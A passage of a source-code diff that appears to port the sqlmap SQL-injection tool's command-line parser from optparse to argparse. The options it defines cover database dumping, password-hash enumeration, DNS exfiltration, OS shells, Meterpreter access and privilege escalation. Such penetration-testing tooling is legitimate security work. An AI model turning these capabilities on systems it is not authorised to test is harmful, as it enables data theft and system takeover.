_add_argument_group + + def _add_argument(self, *args, **kwargs): + return self.add_option(*args, **kwargs) + + OptionGroup.add_argument = _add_argument + +except ImportError: + from argparse import ArgumentParser + from argparse import ArgumentError + from argparse import SUPPRESS + +finally: + def get_actions(instance): + for attr in ("option_list", "_group_actions", "_actions"): + if hasattr(instance, attr): + return getattr(instance, attr) + + def get_groups(parser): + return getattr(parser, "option_groups", None) or getattr(parser, "_action_groups") + + def get_all_options(parser): + retVal = set() + + for option in get_actions(parser): + if hasattr(option, "option_strings"): + retVal.update(option.option_strings) + else: + retVal.update(option._long_opts) + retVal.update(option._short_opts) + + for group in get_groups(parser): + for option in get_actions(group): + if hasattr(option, "option_strings"): + retVal.update(option.option_strings) + else: + retVal.update(option._long_opts) + retVal.update(option._short_opts) + + return retVal -from lib.core.common import checkDeprecatedOptions +from lib.core.common import checkOldOptions +from lib.core.common import checkSystemEncoding +from lib.core.common import dataToStdout from lib.core.common import expandMnemonics -from lib.core.common import getUnicode +from lib.core.common import getSafeExString +from lib.core.compat import xrange +from lib.core.convert import getUnicode +from lib.core.data import cmdLineOptions +from lib.core.data import conf from lib.core.data import logger from lib.core.defaults import defaults +from lib.core.dicts import DEPRECATED_OPTIONS +from lib.core.enums import AUTOCOMPLETE_TYPE +from 
lib.core.exception import SqlmapShellQuitException +from lib.core.exception import SqlmapSilentQuitException +from lib.core.exception import SqlmapSyntaxException +from lib.core.option import _createHomeDirectories from lib.core.settings import BASIC_HELP_ITEMS +from lib.core.settings import DUMMY_URL +from lib.core.settings import IGNORED_OPTIONS +from lib.core.settings import INFERENCE_UNKNOWN_CHAR from lib.core.settings import IS_WIN from lib.core.settings import MAX_HELP_OPTION_LENGTH - -def cmdLineParser(): +from lib.core.settings import VERSION_STRING +from lib.core.shell import autoCompletion +from lib.core.shell import clearHistory +from lib.core.shell import loadHistory +from lib.core.shell import saveHistory +from thirdparty.six.moves import input as _input + +def cmdLineParser(argv=None): """ This function parses the command line parameters and arguments """ - usage = "%s%s [options]" % ("python " if not IS_WIN else "", \ - "\"%s\"" % sys.argv[0] if " " in sys.argv[0] else sys.argv[0]) + if not argv: + argv = sys.argv + + checkSystemEncoding() + + # Reference: https://stackoverflow.com/a/4012683 (Note: previously used "...sys.getfilesystemencoding() or UNICODE_ENCODING") + _ = getUnicode(os.path.basename(argv[0]), encoding=sys.stdin.encoding) - parser = OptionParser(usage=usage) + usage = "%s%s [options]" % ("%s " % os.path.basename(sys.executable) if not IS_WIN else "", "\"%s\"" % _ if " " in _ else _) + parser = ArgumentParser(usage=usage) try: - parser.add_option("--hh", dest="advancedHelp", - action="store_true", - help="Show advanced help message and exit") + parser.add_argument("--hh", dest="advancedHelp", action="store_true", + help="Show advanced help message and exit") - parser.add_option("-v", dest="verbose", type="int", - help="Verbosity level: 0-6 (default %d)" % defaults.verbose) + parser.add_argument("--version", dest="showVersion", action="store_true", + help="Show program's version number and exit") - # Target options - target = OptionGroup(parser, "Target", "At least one of these " - "options has to be specified to set the source " - "to get target urls from") + parser.add_argument("-v", dest="verbose", type=int, + help="Verbosity level: 0-6 (default %d)" % defaults.verbose) - target.add_option("-d", dest="direct", help="Direct " - "connection to the database") + # Target options + target = parser.add_argument_group("Target", "At least one of these options has to be provided to define the target(s)") - target.add_option("-u", "--url", dest="url", help="Target url") + target.add_argument("-u", "--url", dest="url", + help="Target URL (e.g. 
\"http://www.site.com/vuln.php?id=1\")") - target.add_option("-l", dest="logFile", help="Parse targets from Burp " - "or WebScarab proxy logs") + target.add_argument("-d", dest="direct", + help="Connection string for direct database connection") - target.add_option("-m", dest="bulkFile", help="Scan multiple targets enlisted " - "in a given textual file ") + target.add_argument("-l", dest="logFile", + help="Parse target(s) from Burp or WebScarab proxy log file") - target.add_option("-r", dest="requestFile", - help="Load HTTP request from a file") + target.add_argument("-m", dest="bulkFile", + help="Scan multiple targets given in a textual file ") - target.add_option("-s", dest="sessionFile", - help="Load session from a stored (.sqlite) file") + target.add_argument("-r", dest="requestFile", + help="Load HTTP request from a file") - target.add_option("-g", dest="googleDork", - help="Process Google dork results as target urls") + target.add_argument("-g", dest="googleDork", + help="Process Google dork results as target URLs") - target.add_option("-c", dest="configFile", - help="Load options from a configuration INI file") + target.add_argument("-c", dest="configFile", + help="Load options from a configuration INI file") # Request options - request = OptionGroup(parser, "Request", "These options can be used " - "to specify how to connect to the target url") + request = parser.add_argument_group("Request", "These options can be used to specify how to connect to the target URL") + + request.add_argument("-A", "--user-agent", dest="agent", + help="HTTP User-Agent header value") + + request.add_argument("-H", "--header", dest="header", + help="Extra header (e.g. \"X-Forwarded-For: 127.0.0.1\")") + + request.add_argument("--method", dest="method", + help="Force usage of given HTTP method (e.g. PUT)") + + request.add_argument("--data", dest="data", + help="Data string to be sent through POST (e.g. \"id=1\")") + + request.add_argument("--param-del", dest="paramDel", + help="Character used for splitting parameter values (e.g. &)") + + request.add_argument("--cookie", dest="cookie", + help="HTTP Cookie header value (e.g. \"PHPSESSID=a8d127e..\")") + + request.add_argument("--cookie-del", dest="cookieDel", + help="Character used for splitting cookie values (e.g. 
;)") - request.add_option("--data", dest="data", - help="Data string to be sent through POST") + request.add_argument("--live-cookies", dest="liveCookies", + help="Live cookies file used for loading up-to-date values") - request.add_option("--param-del", dest="pDel", - help="Character used for splitting parameter values") + request.add_argument("--load-cookies", dest="loadCookies", + help="File containing cookies in Netscape/wget format") - request.add_option("--cookie", dest="cookie", - help="HTTP Cookie header") + request.add_argument("--drop-set-cookie", dest="dropSetCookie", action="store_true", + help="Ignore Set-Cookie header from response") - request.add_option("--load-cookies", dest="loadCookies", - help="File containing cookies in Netscape/wget format") + request.add_argument("--http1.0", dest="http10", action="store_true", + help="Use HTTP version 1.0 (old)") - request.add_option("--drop-set-cookie", dest="dropSetCookie", - action="store_true", - help="Ignore Set-Cookie header from response") + request.add_argument("--http2", dest="http2", action="store_true", + help="Use HTTP version 2 (experimental)") - request.add_option("--user-agent", dest="agent", - help="HTTP User-Agent header") + request.add_argument("--mobile", dest="mobile", action="store_true", + help="Imitate smartphone through HTTP User-Agent header") - request.add_option("--random-agent", dest="randomAgent", - action="store_true", - help="Use randomly selected HTTP User-Agent header") + request.add_argument("--random-agent", dest="randomAgent", action="store_true", + help="Use randomly selected HTTP User-Agent header value") - request.add_option("--randomize", dest="rParam", - help="Randomly change value for given parameter(s)") + request.add_argument("--host", dest="host", + help="HTTP Host header value") - request.add_option("--force-ssl", dest="forceSSL", - action="store_true", - help="Force usage of SSL/HTTPS requests") + request.add_argument("--referer", dest="referer", + help="HTTP Referer header value") - request.add_option("--host", dest="host", - help="HTTP Host header") + request.add_argument("--headers", dest="headers", + help="Extra headers (e.g. \"Accept-Language: fr\\nETag: 123\")") - request.add_option("--referer", dest="referer", - help="HTTP Referer header") + request.add_argument("--auth-type", dest="authType", + help="HTTP authentication type (Basic, Digest, Bearer, ...)") - request.add_option("--headers", dest="headers", - help="Extra headers (e.g. \"Accept-Language: fr\\nETag: 123\")") + request.add_argument("--auth-cred", dest="authCred", + help="HTTP authentication credentials (name:password)") - request.add_option("--auth-type", dest="aType", - help="HTTP authentication type " - "(Basic, Digest or NTLM)") + request.add_argument("--auth-file", dest="authFile", + help="HTTP authentication PEM cert/private key file") - request.add_option("--auth-cred", dest="aCred", - help="HTTP authentication credentials " - "(name:password)") + request.add_argument("--abort-code", dest="abortCode", + help="Abort on (problematic) HTTP error code(s) (e.g. 401)") - request.add_option("--auth-cert", dest="aCert", - help="HTTP authentication certificate (" - "key_file,cert_file)") + request.add_argument("--ignore-code", dest="ignoreCode", + help="Ignore (problematic) HTTP error code(s) (e.g. 
401)") - request.add_option("--proxy", dest="proxy", - help="Use a HTTP proxy to connect to the target url") + request.add_argument("--ignore-proxy", dest="ignoreProxy", action="store_true", + help="Ignore system default proxy settings") - request.add_option("--proxy-cred", dest="pCred", - help="HTTP proxy authentication credentials " - "(name:password)") + request.add_argument("--ignore-redirects", dest="ignoreRedirects", action="store_true", + help="Ignore redirection attempts") - request.add_option("--ignore-proxy", dest="ignoreProxy", action="store_true", - help="Ignore system default HTTP proxy") + request.add_argument("--ignore-timeouts", dest="ignoreTimeouts", action="store_true", + help="Ignore connection timeouts") - request.add_option("--delay", dest="delay", type="float", - help="Delay in seconds between each HTTP request") + request.add_argument("--proxy", dest="proxy", + help="Use a proxy to connect to the target URL") - request.add_option("--timeout", dest="timeout", type="float", - help="Seconds to wait before timeout connection " - "(default %d)" % defaults.timeout) + request.add_argument("--proxy-cred", dest="proxyCred", + help="Proxy authentication credentials (name:password)") - request.add_option("--retries", dest="retries", type="int", - help="Retries when the connection timeouts " - "(default %d)" % defaults.retries) + request.add_argument("--proxy-file", dest="proxyFile", + help="Load proxy list from a file") - request.add_option("--scope", dest="scope", - help="Regexp to filter targets from provided proxy log") + request.add_argument("--proxy-freq", dest="proxyFreq", type=int, + help="Requests between change of proxy from a given list") - request.add_option("--safe-url", dest="safUrl", - help="Url address to visit frequently during testing") + request.add_argument("--tor", dest="tor", action="store_true", + help="Use Tor anonymity network") - request.add_option("--safe-freq", dest="saFreq", type="int", - help="Test requests between two visits to a given safe url") + request.add_argument("--tor-port", dest="torPort", + help="Set Tor proxy port other than default") - request.add_option("--skip-urlencode", dest="skipUrlEncode", - action="store_true", - help="Skip URL encoding of payload data") + request.add_argument("--tor-type", dest="torType", + help="Set Tor proxy type (HTTP, SOCKS4 or SOCKS5 (default))") - request.add_option("--eval", dest="evalCode", - help="Evaluate provided Python code before the request (e.g. \"import hashlib;id2=hashlib.md5(id).hexdigest()\")") + request.add_argument("--check-tor", dest="checkTor", action="store_true", + help="Check to see if Tor is used properly") + + request.add_argument("--delay", dest="delay", type=float, + help="Delay in seconds between each HTTP request") + + request.add_argument("--timeout", dest="timeout", type=float, + help="Seconds to wait before timeout connection (default %d)" % defaults.timeout) + + request.add_argument("--retries", dest="retries", type=int, + help="Retries when the connection timeouts (default %d)" % defaults.retries) + + request.add_argument("--retry-on", dest="retryOn", + help="Retry request on regexp matching content (e.g. 
\"drop\")") + + request.add_argument("--randomize", dest="rParam", + help="Randomly change value for given parameter(s)") + + request.add_argument("--safe-url", dest="safeUrl", + help="URL address to visit frequently during testing") + + request.add_argument("--safe-post", dest="safePost", + help="POST data to send to a safe URL") + + request.add_argument("--safe-req", dest="safeReqFile", + help="Load safe HTTP request from a file") + + request.add_argument("--safe-freq", dest="safeFreq", type=int, + help="Regular requests between visits to a safe URL") + + request.add_argument("--skip-urlencode", dest="skipUrlEncode", action="store_true", + help="Skip URL encoding of payload data") + + request.add_argument("--csrf-token", dest="csrfToken", + help="Parameter used to hold anti-CSRF token") + + request.add_argument("--csrf-url", dest="csrfUrl", + help="URL address to visit for extraction of anti-CSRF token") + + request.add_argument("--csrf-method", dest="csrfMethod", + help="HTTP method to use during anti-CSRF token page visit") + + request.add_argument("--csrf-data", dest="csrfData", + help="POST data to send during anti-CSRF token page visit") + + request.add_argument("--csrf-retries", dest="csrfRetries", type=int, + help="Retries for anti-CSRF token retrieval (default %d)" % defaults.csrfRetries) + + request.add_argument("--force-ssl", dest="forceSSL", action="store_true", + help="Force usage of SSL/HTTPS") + + request.add_argument("--chunked", dest="chunked", action="store_true", + help="Use HTTP chunked transfer encoded (POST) requests") + + request.add_argument("--hpp", dest="hpp", action="store_true", + help="Use HTTP parameter pollution method") + + request.add_argument("--eval", dest="evalCode", + help="Evaluate provided Python code before the request (e.g. 
\"import hashlib;id2=hashlib.md5(id).hexdigest()\")") # Optimization options - optimization = OptionGroup(parser, "Optimization", "These " - "options can be used to optimize the " - "performance of sqlmap") + optimization = parser.add_argument_group("Optimization", "These options can be used to optimize the performance of sqlmap") - optimization.add_option("-o", dest="optimize", - action="store_true", - help="Turn on all optimization switches") + optimization.add_argument("-o", dest="optimize", action="store_true", + help="Turn on all optimization switches") - optimization.add_option("--predict-output", dest="predictOutput", action="store_true", - help="Predict common queries output") + optimization.add_argument("--predict-output", dest="predictOutput", action="store_true", + help="Predict common queries output") - optimization.add_option("--keep-alive", dest="keepAlive", action="store_true", - help="Use persistent HTTP(s) connections") + optimization.add_argument("--keep-alive", dest="keepAlive", action="store_true", + help="Use persistent HTTP(s) connections") - optimization.add_option("--null-connection", dest="nullConnection", action="store_true", - help="Retrieve page length without actual HTTP response body") + optimization.add_argument("--null-connection", dest="nullConnection", action="store_true", + help="Retrieve page length without actual HTTP response body") - optimization.add_option("--threads", dest="threads", type="int", - help="Max number of concurrent HTTP(s) " - "requests (default %d)" % defaults.threads) + optimization.add_argument("--threads", dest="threads", type=int, + help="Max number of concurrent HTTP(s) requests (default %d)" % defaults.threads) # Injection options - injection = OptionGroup(parser, "Injection", "These options can be " - "used to specify which parameters to test " - "for, provide custom injection payloads and " - "optional tampering scripts") + injection = parser.add_argument_group("Injection", "These options can be used to specify which parameters to test for, provide custom injection payloads and optional tampering scripts") - injection.add_option("-p", dest="testParameter", - help="Testable parameter(s)") + injection.add_argument("-p", dest="testParameter", + help="Testable parameter(s)") - injection.add_option("--dbms", dest="dbms", - help="Force back-end DBMS to this value") + injection.add_argument("--skip", dest="skip", + help="Skip testing for given parameter(s)") - injection.add_option("--os", dest="os", - help="Force back-end DBMS operating system " - "to this value") + injection.add_argument("--skip-static", dest="skipStatic", action="store_true", + help="Skip testing parameters that not appear to be dynamic") - injection.add_option("--invalid-bignum", dest="invalidBignum", - action="store_true", - help="Use big numbers for invalidating values") + injection.add_argument("--param-exclude", dest="paramExclude", + help="Regexp to exclude parameters from testing (e.g. \"ses\")") - injection.add_option("--invalid-logical", dest="invalidLogical", - action="store_true", - help="Use logical operations for invalidating values") + injection.add_argument("--param-filter", dest="paramFilter", + help="Select testable parameter(s) by place (e.g. 
\"POST\")") - injection.add_option("--no-cast", dest="noCast", - action="store_true", - help="Turn off payload casting mechanism") + injection.add_argument("--dbms", dest="dbms", + help="Force back-end DBMS to provided value") - injection.add_option("--no-escape", dest="noEscape", - action="store_true", - help="Turn off string escaping mechanism") + injection.add_argument("--dbms-cred", dest="dbmsCred", + help="DBMS authentication credentials (user:password)") - injection.add_option("--prefix", dest="prefix", - help="Injection payload prefix string") + injection.add_argument("--os", dest="os", + help="Force back-end DBMS operating system to provided value") - injection.add_option("--suffix", dest="suffix", - help="Injection payload suffix string") + injection.add_argument("--invalid-bignum", dest="invalidBignum", action="store_true", + help="Use big numbers for invalidating values") - injection.add_option("--skip", dest="skip", - help="Skip testing for given parameter(s)") + injection.add_argument("--invalid-logical", dest="invalidLogical", action="store_true", + help="Use logical operations for invalidating values") - injection.add_option("--tamper", dest="tamper", - help="Use given script(s) for tampering injection data") + injection.add_argument("--invalid-string", dest="invalidString", action="store_true", + help="Use random strings for invalidating values") + + injection.add_argument("--no-cast", dest="noCast", action="store_true", + help="Turn off payload casting mechanism") + + injection.add_argument("--no-escape", dest="noEscape", action="store_true", + help="Turn off string escaping mechanism") + + injection.add_argument("--prefix", dest="prefix", + help="Injection payload prefix string") + + injection.add_argument("--suffix", dest="suffix", + help="Injection payload suffix string") + + injection.add_argument("--tamper", dest="tamper", + help="Use given script(s) for tampering injection data") # Detection options - detection = OptionGroup(parser, "Detection", "These options can be " - "used to specify how to parse " - "and compare page content from " - "HTTP responses when using blind SQL " - "injection technique") + detection = parser.add_argument_group("Detection", "These options can be used to customize the detection phase") + + detection.add_argument("--level", dest="level", type=int, + help="Level of tests to perform (1-5, default %d)" % defaults.level) - detection.add_option("--level", dest="level", type="int", - help="Level of tests to perform (1-5, " - "default %d)" % defaults.level) + detection.add_argument("--risk", dest="risk", type=int, + help="Risk of tests to perform (1-3, default %d)" % defaults.risk) - detection.add_option("--risk", dest="risk", type="int", - help="Risk of tests to perform (0-3, " - "default %d)" % defaults.level) + detection.add_argument("--string", dest="string", + help="String to match when query is evaluated to True") - detection.add_option("--string", dest="string", - help="String to match when " - "query is evaluated to True") + detection.add_argument("--not-string", dest="notString", + help="String to match when query is evaluated to False") - detection.add_option("--not-string", dest="notString", - help="String to match when " - "query is evaluated to False") + detection.add_argument("--regexp", dest="regexp", + help="Regexp to match when query is evaluated to True") - detection.add_option("--regexp", dest="regexp", - help="Regexp to match when " - "query is evaluated to True") + detection.add_argument("--code", dest="code", type=int, + 
help="HTTP code to match when query is evaluated to True") - detection.add_option("--code", dest="code", type="int", - help="HTTP code to match when " - "query is evaluated to True") + detection.add_argument("--smart", dest="smart", action="store_true", + help="Perform thorough tests only if positive heuristic(s)") - detection.add_option("--text-only", dest="textOnly", - action="store_true", - help="Compare pages based only on the textual content") + detection.add_argument("--text-only", dest="textOnly", action="store_true", + help="Compare pages based only on the textual content") - detection.add_option("--titles", dest="titles", - action="store_true", - help="Compare pages based only on their titles") + detection.add_argument("--titles", dest="titles", action="store_true", + help="Compare pages based only on their titles") # Techniques options - techniques = OptionGroup(parser, "Techniques", "These options can be " - "used to tweak testing of specific SQL " - "injection techniques") + techniques = parser.add_argument_group("Techniques", "These options can be used to tweak testing of specific SQL injection techniques") - techniques.add_option("--technique", dest="tech", - help="SQL injection techniques to test for " - "(default \"%s\")" % defaults.tech) + techniques.add_argument("--technique", dest="technique", + help="SQL injection techniques to use (default \"%s\")" % defaults.technique) - techniques.add_option("--time-sec", dest="timeSec", - type="int", - help="Seconds to delay the DBMS response " - "(default %d)" % defaults.timeSec) + techniques.add_argument("--time-sec", dest="timeSec", type=int, + help="Seconds to delay the DBMS response (default %d)" % defaults.timeSec) - techniques.add_option("--union-cols", dest="uCols", - help="Range of columns to test for UNION query SQL injection") + techniques.add_argument("--disable-stats", dest="disableStats", action="store_true", + help="Disable the statistical model for detecting the delay") - techniques.add_option("--union-char", dest="uChar", - help="Character to use for bruteforcing number of columns") + techniques.add_argument("--union-cols", dest="uCols", + help="Range of columns to test for UNION query SQL injection") - techniques.add_option("--dns-domain", dest="dnsName", - help="Domain name used for DNS exfiltration attack") + techniques.add_argument("--union-char", dest="uChar", + help="Character to use for bruteforcing number of columns") - techniques.add_option("--second-order", dest="secondOrder", - help="Resulting page url searched for second-order " - "response") + techniques.add_argument("--union-from", dest="uFrom", + help="Table to use in FROM part of UNION query SQL injection") + + techniques.add_argument("--union-values", dest="uValues", + help="Column values to use for UNION query SQL injection") + + techniques.add_argument("--dns-domain", dest="dnsDomain", + help="Domain name used for DNS exfiltration attack") + + techniques.add_argument("--second-url", dest="secondUrl", + help="Resulting page URL searched for second-order response") + + techniques.add_argument("--second-req", dest="secondReq", + help="Load second-order HTTP request from file") # Fingerprint options - fingerprint = OptionGroup(parser, "Fingerprint") + fingerprint = parser.add_argument_group("Fingerprint") - fingerprint.add_option("-f", "--fingerprint", dest="extensiveFp", - action="store_true", - help="Perform an extensive DBMS version fingerprint") + fingerprint.add_argument("-f", "--fingerprint", dest="extensiveFp", action="store_true", + 
help="Perform an extensive DBMS version fingerprint") # Enumeration options - enumeration = OptionGroup(parser, "Enumeration", "These options can " - "be used to enumerate the back-end database " - "management system information, structure " - "and data contained in the tables. Moreover " - "you can run your own SQL statements") + enumeration = parser.add_argument_group("Enumeration", "These options can be used to enumerate the back-end database management system information, structure and data contained in the tables") - enumeration.add_option("-a", "--all", dest="getAll", - action="store_true", help="Retrieve everything") + enumeration.add_argument("-a", "--all", dest="getAll", action="store_true", + help="Retrieve everything") - enumeration.add_option("-b", "--banner", dest="getBanner", - action="store_true", help="Retrieve DBMS banner") + enumeration.add_argument("-b", "--banner", dest="getBanner", action="store_true", + help="Retrieve DBMS banner") - enumeration.add_option("--current-user", dest="getCurrentUser", - action="store_true", - help="Retrieve DBMS current user") + enumeration.add_argument("--current-user", dest="getCurrentUser", action="store_true", + help="Retrieve DBMS current user") - enumeration.add_option("--current-db", dest="getCurrentDb", - action="store_true", - help="Retrieve DBMS current database") + enumeration.add_argument("--current-db", dest="getCurrentDb", action="store_true", + help="Retrieve DBMS current database") - enumeration.add_option("--hostname", dest="getHostname", - action="store_true", - help="Retrieve DBMS server hostname") + enumeration.add_argument("--hostname", dest="getHostname", action="store_true", + help="Retrieve DBMS server hostname") - enumeration.add_option("--is-dba", dest="isDba", - action="store_true", - help="Detect if the DBMS current user is DBA") + enumeration.add_argument("--is-dba", dest="isDba", action="store_true", + help="Detect if the DBMS current user is DBA") - enumeration.add_option("--users", dest="getUsers", action="store_true", - help="Enumerate DBMS users") + enumeration.add_argument("--users", dest="getUsers", action="store_true", + help="Enumerate DBMS users") - enumeration.add_option("--passwords", dest="getPasswordHashes", - action="store_true", - help="Enumerate DBMS users password hashes") + enumeration.add_argument("--passwords", dest="getPasswordHashes", action="store_true", + help="Enumerate DBMS users password hashes") - enumeration.add_option("--privileges", dest="getPrivileges", - action="store_true", - help="Enumerate DBMS users privileges") + enumeration.add_argument("--privileges", dest="getPrivileges", action="store_true", + help="Enumerate DBMS users privileges") - enumeration.add_option("--roles", dest="getRoles", - action="store_true", - help="Enumerate DBMS users roles") + enumeration.add_argument("--roles", dest="getRoles", action="store_true", + help="Enumerate DBMS users roles") - enumeration.add_option("--dbs", dest="getDbs", action="store_true", - help="Enumerate DBMS databases") + enumeration.add_argument("--dbs", dest="getDbs", action="store_true", + help="Enumerate DBMS databases") - enumeration.add_option("--tables", dest="getTables", action="store_true", - help="Enumerate DBMS database tables") + enumeration.add_argument("--tables", dest="getTables", action="store_true", + help="Enumerate DBMS database tables") - enumeration.add_option("--columns", dest="getColumns", action="store_true", - help="Enumerate DBMS database table columns") + enumeration.add_argument("--columns", 
dest="getColumns", action="store_true", + help="Enumerate DBMS database table columns") - enumeration.add_option("--schema", dest="getSchema", action="store_true", - help="Enumerate DBMS schema") + enumeration.add_argument("--schema", dest="getSchema", action="store_true", + help="Enumerate DBMS schema") - enumeration.add_option("--count", dest="getCount", action="store_true", - help="Retrieve number of entries for table(s)") + enumeration.add_argument("--count", dest="getCount", action="store_true", + help="Retrieve number of entries for table(s)") - enumeration.add_option("--dump", dest="dumpTable", action="store_true", - help="Dump DBMS database table entries") + enumeration.add_argument("--dump", dest="dumpTable", action="store_true", + help="Dump DBMS database table entries") - enumeration.add_option("--dump-all", dest="dumpAll", action="store_true", - help="Dump all DBMS databases tables entries") + enumeration.add_argument("--dump-all", dest="dumpAll", action="store_true", + help="Dump all DBMS databases tables entries") - enumeration.add_option("--search", dest="search", action="store_true", - help="Search column(s), table(s) and/or database name(s)") + enumeration.add_argument("--search", dest="search", action="store_true", + help="Search column(s), table(s) and/or database name(s)") - enumeration.add_option("-D", dest="db", - help="DBMS database to enumerate") + enumeration.add_argument("--comments", dest="getComments", action="store_true", + help="Check for DBMS comments during enumeration") - enumeration.add_option("-T", dest="tbl", - help="DBMS database table to enumerate") + enumeration.add_argument("--statements", dest="getStatements", action="store_true", + help="Retrieve SQL statements being run on DBMS") - enumeration.add_option("-C", dest="col", - help="DBMS database table column to enumerate") + enumeration.add_argument("-D", dest="db", + help="DBMS database to enumerate") - enumeration.add_option("-U", dest="user", - help="DBMS user to enumerate") + enumeration.add_argument("-T", dest="tbl", + help="DBMS database table(s) to enumerate") - enumeration.add_option("--exclude-sysdbs", dest="excludeSysDbs", - action="store_true", - help="Exclude DBMS system databases when " - "enumerating tables") + enumeration.add_argument("-C", dest="col", + help="DBMS database table column(s) to enumerate") - enumeration.add_option("--start", dest="limitStart", type="int", - help="First query output entry to retrieve") + enumeration.add_argument("-X", dest="exclude", + help="DBMS database identifier(s) to not enumerate") - enumeration.add_option("--stop", dest="limitStop", type="int", - help="Last query output entry to retrieve") + enumeration.add_argument("-U", dest="user", + help="DBMS user to enumerate") - enumeration.add_option("--first", dest="firstChar", type="int", - help="First query output word character to retrieve") + enumeration.add_argument("--exclude-sysdbs", dest="excludeSysDbs", action="store_true", + help="Exclude DBMS system databases when enumerating tables") - enumeration.add_option("--last", dest="lastChar", type="int", - help="Last query output word character to retrieve") + enumeration.add_argument("--pivot-column", dest="pivotColumn", + help="Pivot column name") - enumeration.add_option("--sql-query", dest="query", - help="SQL statement to be executed") + enumeration.add_argument("--where", dest="dumpWhere", + help="Use WHERE condition while table dumping") - enumeration.add_option("--sql-shell", dest="sqlShell", - action="store_true", - help="Prompt for an 
interactive SQL shell") + enumeration.add_argument("--start", dest="limitStart", type=int, + help="First dump table entry to retrieve") - enumeration.add_option("--sql-file", dest="sqlFile", - help="Execute SQL statements from given file(s)") + enumeration.add_argument("--stop", dest="limitStop", type=int, + help="Last dump table entry to retrieve") - # User-defined function options - brute = OptionGroup(parser, "Brute force", "These " - "options can be used to run brute force " - "checks") + enumeration.add_argument("--first", dest="firstChar", type=int, + help="First query output word character to retrieve") + + enumeration.add_argument("--last", dest="lastChar", type=int, + help="Last query output word character to retrieve") + + enumeration.add_argument("--sql-query", dest="sqlQuery", + help="SQL statement to be executed") - brute.add_option("--common-tables", dest="commonTables", action="store_true", - help="Check existence of common tables") + enumeration.add_argument("--sql-shell", dest="sqlShell", action="store_true", + help="Prompt for an interactive SQL shell") - brute.add_option("--common-columns", dest="commonColumns", action="store_true", - help="Check existence of common columns") + enumeration.add_argument("--sql-file", dest="sqlFile", + help="Execute SQL statements from given file(s)") + + # Brute force options + brute = parser.add_argument_group("Brute force", "These options can be used to run brute force checks") + + brute.add_argument("--common-tables", dest="commonTables", action="store_true", + help="Check existence of common tables") + + brute.add_argument("--common-columns", dest="commonColumns", action="store_true", + help="Check existence of common columns") + + brute.add_argument("--common-files", dest="commonFiles", action="store_true", + help="Check existence of common files") # User-defined function options - udf = OptionGroup(parser, "User-defined function injection", "These " - "options can be used to create custom user-defined " - "functions") + udf = parser.add_argument_group("User-defined function injection", "These options can be used to create custom user-defined functions") - udf.add_option("--udf-inject", dest="udfInject", action="store_true", - help="Inject custom user-defined functions") + udf.add_argument("--udf-inject", dest="udfInject", action="store_true", + help="Inject custom user-defined functions") - udf.add_option("--shared-lib", dest="shLib", - help="Local path of the shared library") + udf.add_argument("--shared-lib", dest="shLib", + help="Local path of the shared library") # File system options - filesystem = OptionGroup(parser, "File system access", "These options " - "can be used to access the back-end database " - "management system underlying file system") + filesystem = parser.add_argument_group("File system access", "These options can be used to access the back-end database management system underlying file system") - filesystem.add_option("--file-read", dest="rFile", - help="Read a file from the back-end DBMS " - "file system") + filesystem.add_argument("--file-read", dest="fileRead", + help="Read a file from the back-end DBMS file system") - filesystem.add_option("--file-write", dest="wFile", - help="Write a local file on the back-end " - "DBMS file system") + filesystem.add_argument("--file-write", dest="fileWrite", + help="Write a local file on the back-end DBMS file system") - filesystem.add_option("--file-dest", dest="dFile", - help="Back-end DBMS absolute filepath to " - "write to") + filesystem.add_argument("--file-dest", 
dest="fileDest", + help="Back-end DBMS absolute filepath to write to") # Takeover options - takeover = OptionGroup(parser, "Operating system access", "These " - "options can be used to access the back-end " - "database management system underlying " - "operating system") - - takeover.add_option("--os-cmd", dest="osCmd", - help="Execute an operating system command") - - takeover.add_option("--os-shell", dest="osShell", - action="store_true", - help="Prompt for an interactive operating " - "system shell") - - takeover.add_option("--os-pwn", dest="osPwn", - action="store_true", - help="Prompt for an out-of-band shell, " - "meterpreter or VNC") - - takeover.add_option("--os-smbrelay", dest="osSmb", - action="store_true", - help="One click prompt for an OOB shell, " - "meterpreter or VNC") - - takeover.add_option("--os-bof", dest="osBof", - action="store_true", - help="Stored procedure buffer overflow " + takeover = parser.add_argument_group("Operating system access", "These options can be used to access the back-end database management system underlying operating system") + + takeover.add_argument("--os-cmd", dest="osCmd", + help="Execute an operating system command") + + takeover.add_argument("--os-shell", dest="osShell", action="store_true", + help="Prompt for an interactive operating system shell") + + takeover.add_argument("--os-pwn", dest="osPwn", action="store_true", + help="Prompt for an OOB shell, Meterpreter or VNC") + + takeover.add_argument("--os-smbrelay", dest="osSmb", action="store_true", + help="One click prompt for an OOB shell, Meterpreter or VNC") + + takeover.add_argument("--os-bof", dest="osBof", action="store_true", + help="Stored procedure buffer overflow " "exploitation") - takeover.add_option("--priv-esc", dest="privEsc", - action="store_true", - help="Database process' user privilege escalation") + takeover.add_argument("--priv-esc", dest="privEsc", action="store_true", + help="Database process user privilege escalation") - takeover.add_option("--msf-path", dest="msfPath", - help="Local path where Metasploit Framework " - "is installed") + takeover.add_argument("--msf-path", dest="msfPath", + help="Local path where Metasploit Framework is installed") - takeover.add_option("--tmp-path", dest="tmpPath", - help="Remote absolute path of temporary files " - "directory") + takeover.add_argument("--tmp-path", dest="tmpPath", + help="Remote absolute path of temporary files directory") # Windows registry options - windows = OptionGroup(parser, "Windows registry access", "These " - "options can be used to access the back-end " - "database management system Windows " - "registry") + windows = parser.add_argument_group("Windows registry access", "These options can be used to access the back-end database management system Windows registry") - windows.add_option("--reg-read", dest="regRead", - action="store_true", - help="Read a Windows registry key value") + windows.add_argument("--reg-read", dest="regRead", action="store_true", + help="Read a Windows registry key value") - windows.add_option("--reg-add", dest="regAdd", - action="store_true", - help="Write a Windows registry key value data") + windows.add_argument("--reg-add", dest="regAdd", action="store_true", + help="Write a Windows registry key value data") - windows.add_option("--reg-del", dest="regDel", - action="store_true", - help="Delete a Windows registry key value") + windows.add_argument("--reg-del", dest="regDel", action="store_true", + help="Delete a Windows registry key value") - windows.add_option("--reg-key", 
